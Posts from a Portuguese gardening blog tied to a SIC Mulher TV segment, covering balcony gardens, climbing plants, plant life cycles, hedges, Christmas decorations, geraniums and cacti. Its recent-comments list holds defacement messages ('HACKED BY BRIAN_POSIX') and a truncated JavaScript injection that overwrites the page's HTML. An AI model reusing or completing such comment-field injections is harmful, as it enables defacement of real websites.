Decor Verde @ 17:14

Qui, 23/05/13

Na continuação do tema das hortas, nesta rubrica vimos exemplificar como é fácil e divertido ter uma horta em casa, reciclando materiais.

 

Vamos então exemplificar opções de como deve fazer uma horta com materiais reciclados.




Decor Verde @ 18:32

Seg, 15/04/13

Nos dias de hoje é completamente possível criar uma horta no seu apartamento, mesmo que este não tenha um jardim. Pode criar a horta numa varanda /terraço.

No Horto do Campo Grande poderá encontrar várias soluções a todos os preços. Nesta rubrica vimos exemplificar como é fácil criar, manter e reciclar uma horta numa varanda ou terraço.

Antes de criar a sua horta na varanda/terraço é necessário ter em conta:

- A exposição solar do local, a mais favorável é Poente ou Nascente;
- Selecção de plantas;
- A escolha das floreiras onde vai fazer a sua horta;
- Quais as necessidades das hortícolas em vasos/floreiras;

 

Tudo isto fatores a ter em conta! E por isso, não perca o Mais Mulher desta terça-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Decor Verde @ 18:32

Seg, 18/03/13

Plantas Trepadeiras versus outro tipo de plantas!

A Trepadeira é uma planta que pela sua natureza necessita de um apoio para crescer na vertical e de podas de formação para atingir o tamanho e efeito que desejamos.

As trepadeiras são muito versáteis, pois proporcionam varias oportunidades de ideias para o Jardim, realçando uma parede, estrutura ou pérgula. Um dos aspectos interessantes é que as trepadeiras podem ajudar a tapar espaços ou zonas de menos interesse.

As trepadeiras mais populares têm aromas e cores intensas que nos proporcionam jardins magníficos e perfumados, como por exemplo o Jasmim, bougainvillea, etc.


Suportes e métodos de trepar:
Algumas trepadeiras não precisam de suporte pois têm métodos como raízes aéreas e agarram-se “autonomamente” a qualquer estrutura seja ela tronco, treliça ou parede como por ex. vinha, hera, ou maracujá.

Outras espécies necessitam de apoios para as ajudar a crescer e serem induzidas a trepar. A forma como cada trepadeira se adapta ao seu apoio depende da morfologia de cada planta. Por ex. a Glicínia ata-se da esquerda para a direita.

 

Trepadeiras versus outros Formatos:
As Trepadeiras têm algumas vantagens em relação a outro tipo de plantas, ao apoiarem-se numa estrutura conseguem atingir alturas e formatos que outras plantas não conseguem. O interessante é que uma planta trepadeira pode crescer noutros formatos se assim o desejarmos, ou seja a mesma planta pode ser induzida a crescer como trepadeira, arbusto, ou arvore…

 

Por isso não perca estes maravilhosos concelhos com Inês Oliveira, do Horto do Campo Grande, e Rui Reis, paisagista do Horto do Campo Grande.

No Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Decor Verde @ 18:33

Seg, 18/02/13

A Primavera está a chegar, e com ela os olhos viram-se para os jardins.

Quando se vai a um centro de jardinagem comprar uma planta, é necessário ter em atenção o ciclo de vida das mesmas, de forma a não ficarmos admirados quando esta termina. No mundo das plantas existem três tipos muito importantes:

As plantas anuais, bienais e as vivazes.

Plantas anuais são tipos de plantas que normalmente germinam, florescem e morrem completando o seu ciclo de vida num ano ou menos. Se pretende plantas que dêem flor rapidamente e tenham um período de floração prolongado, o melhor é escolher as plantas anuais, sabendo que estas são mais sensíveis.

Plantas Bienais são aquelas cujo ciclo de crescimento se inicia com a semente passando pela fase vegetativa e pela planta florescente até de novo, ao estado de semente, o ciclo completa-se em duas estações de crescimento.

Plantas vivazes, são herbáceas que vivem mais do que dois anos. Enquanto a folhagem da maior parte das vivazes morre todos os anos, as raízes são capazes de sobreviver aos graus de variação do frio do Inverno, e de voltar a crescer de novo na Primavera.

 

Por isso prepare o seu jardim para esta primavera que se avizinha com Inês Oliveira e o Decor Verde!

 

No Mais Mulher desta terça-feira, às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 






Decor Verde @ 18:34

Seg, 14/01/13

As sebes de jardim são importantes no estabelecimento da estrutura e no aspecto geral dos jardins, embora também possam desempenhar outras funções.


Nesta rubrica vamos falar-lhe das principais funções das sebes no jardim, das espécies adequadas para esta função, de como plantar e tratar de forma a ter uma sebe forte e resistente no seu jardim.

 

Dicas a não perder, no Mais Mulher, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!




Decor Verde @ 18:49

Seg, 03/12/12

O mês de Dezembro é um mês de festa, aproxima-se o Natal e o Fim do Ano.
Sendo o Natal, uma das épocas mais importantes do nosso calendário, este é comemorado no meio de símbolos e tradições, como é o exemplo da árvore de natal, dos centros de mesa e das coroas de abeto.


Nesta rubrica vamos descobrir as tendências para as decorações de Natal de 2012 e vamos explicar como fazer um centro de mesa.

 

Não perca no Mais Mulher desta terça-feira de Dezembro, às 17:30 na Sic mulher!

 

Feliz Natal!

 

Veja o video aqui!




Decor Verde @ 18:04

Seg, 05/11/12

O Grupo Horto do Campo Grande na procura constante de soluções inovadoras e criativas, passa a representar a Flowerbox em Abril de 2010 – wall concept decor para Portugal.

 

Todos os suportes da Flowerbox podem ser colocados na vertical, a grande maioria como um quadro, mas algumas das gamas também dão a possibilidade de ser colocadas como uma moldura (gama clássico). Em resumo a Flowerbox veio dinamizar a decoração de ambientes com plantas ornamentais criando pequenos quadros vivos personalizados.

 

Todas as plantas são naturais, embora neste momento existe Flowerbox com plantas artificiais ou preservadas para espaços que não tenham luz natural.

 

Veja o vídeo aqui!




Decor Verde @ 19:30

Qua, 10/10/12

Chocolates e flores são uma combinação perfeita pois além de ser romântica é deliciosa. Sempre que pensamos em presentear alguém a primeira imagem que nos chega é uma caixa de chocolates ou um bouquet de flores. Assim sendo e como estamos a atravessar uma altura de criatividade e inovação, o Horto do Campo Grande/ Flowerbox convidou os chocolates Arcádia a criarem uma parceria explosiva, unindo num espaço único as mais belas flores com os melhores chocolates artesanais. No dia 12 de Outubro visite-nos na loja da Av. Da Republica e venha maravilhar-se com as rosas verdadeiras enquanto se delicia com as de chocolate!

 

Veja o vídeo aqui!




Decor Verde @ 18:33

Seg, 10/09/12

A sardinheira, gerânio ou pelargonium sp. é uma planta muito característica do nosso país.
Quem não se lembra de andar a passear pelos bairros mais antigos e típicos de Portugal e ver as sardinheiras com as suas inúmeras cores a alegrar os pátios e as varandas.
A preferência pelas sardinheiras deve-se ao fato de serem plantas que não necessitam de muitos cuidados e de darem flor praticamente todo o ano.

Nesta rubrica vamos explicar o mundo dos gerânios mais conhecidos por sardinheiras.




Decor Verde @ 18:33

Seg, 23/07/12

Os cactos e suculentas são plantas que têm a grande particularidade de resistir a vários ambientes devido à sua enorme capacidade de retenção de água. Há um mito de que trazem azar: ”casa com cactos, casa com desacatos”, mas na verdade hoje vamos demonstrar como estas plantas são versáteis e interessantes.
Existe uma grande variedade de cactos e suculentas. E este tema foi escolhido por necessitarem de pouca rega, enquadrado no modelo dos nossos jardins sustentáveis importante nos dias de hoje.

Saiba tudo sobre estas plantas , na rubrica " Decor Verde"!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO